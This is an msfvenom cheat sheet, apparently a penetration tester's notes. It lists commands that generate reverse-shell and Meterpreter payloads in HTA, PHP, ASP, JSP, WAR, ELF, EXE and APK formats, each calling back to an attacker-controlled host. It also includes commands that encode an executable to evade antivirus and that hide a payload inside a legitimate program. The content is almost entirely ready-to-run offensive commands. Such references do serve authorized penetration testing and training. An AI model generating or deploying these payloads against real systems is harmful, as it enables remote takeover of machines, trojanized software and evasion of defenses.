Msfvenom
msfvenom help
list payloads
msfvenom -l payloads
list formats
msfvenom -l formats
list encoders
msfvenom -l encoders
msfvenom Shells
hta-psh msfvenom
Returns a cmd.exe prompt
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.1.2 LPORT=9005 -f hta-psh -o evil.hta
php msfvenom
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o revshell.php
asp msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f asp -o revshell.asp
jsp msfvenom
msfvenom -p java/jsp_revshell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o revshell.jsp
war msfvenom
msfvenom -p java/jsp_revshell_reverse_tcp LHOST=<IP> LPORT=<port> -f war -o revshell.war
linux elf msfvenom
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f elf -o revshell.elf
exe encoded msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -e x86/shikata_ga_nai -b ‘\x00’ -i 5 -f exe -o revshell.exe
merge exe with payload msfvenom
msfvenom -x normal.exe -k -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe
android msfvenom
msfvenom -p android/meterpreter/reverse/tcp LHOST=<IP> LPORT=<port> R -o revshell.apk